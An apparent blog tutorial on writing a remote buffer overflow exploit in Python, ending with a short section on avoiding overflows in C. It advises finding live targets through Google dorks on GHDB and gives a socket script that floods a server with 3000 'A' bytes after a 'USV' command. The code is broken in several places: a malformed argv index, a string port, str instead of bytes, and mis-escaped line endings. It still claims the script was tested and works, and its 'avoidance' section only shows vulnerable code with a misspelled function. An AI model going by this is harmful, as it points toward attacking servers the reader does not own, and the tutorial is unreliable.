How to Write A Remote Buffer Overflow Exploit Using Python

3.1K

Welcome back guys, today we will learn how to write a remote buffer overflow using Python programming language only with TCP.

What you actually need:

-Python 3.4(or above)

-A stable internet connection

-A vulnerable server

-Computer with Windows or Linux Operating System

If you don’t have Python installed on your computer you can download it from https://www.python.org/downloads/. The installation process is very easy and straight forward.

Writing A Remote Buffer Overflow Exploit Using Python

1. Find a server for testing pourpose

This is a bit complicated part. Try to search for dorks at GHDB (https://www.exploit-db.com/google-hacking-database/). You can also try searching for for vulnerable software at Exploit-DB (https://www.exploit-db.com).

2. Coding

Coding is the fun part. Let us start by importing sys and socket, then, write the below code:

for carg in sys.argv:

            if carg == “-s”:

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        host = sys.argv[argnum]

            elif carg == “-p”:

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        port = sys.argv[argnum[

buffer = “\x41″* 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

s.send(“USV ” + buffer + “//r//n//r”)

s.close()

The code will look like this:

Now, lets see what the code actually does. We already know the argument indentification script.  The second line creates a buffer, which is \x41 multiplied 3000 times. Then we can see the lines of declaring the s as socket, then connecting with it, sending the required buffer and closing the socket. Looks pretty easy right.

Once we are done with the above steps, lets check the output of our script!

As you can see, the script works fine and I have tested it a couple of times.

How to avoid Remote Buffer Overflow

The solution depends on your programming language for example, if you are using C language.

int authed = 0;
char password_buffer[16];
strcopy(password_buffer, your_password)
if (strcmp(password_buffer, password) == 0) {
authed = 1;
}
else {
authed = 0;
}

So, once the your_password is over 16, you can implement auth overflow, or if there are even more, you can get buffer overflow with segmentation fault error.

There are various solutions for this problem.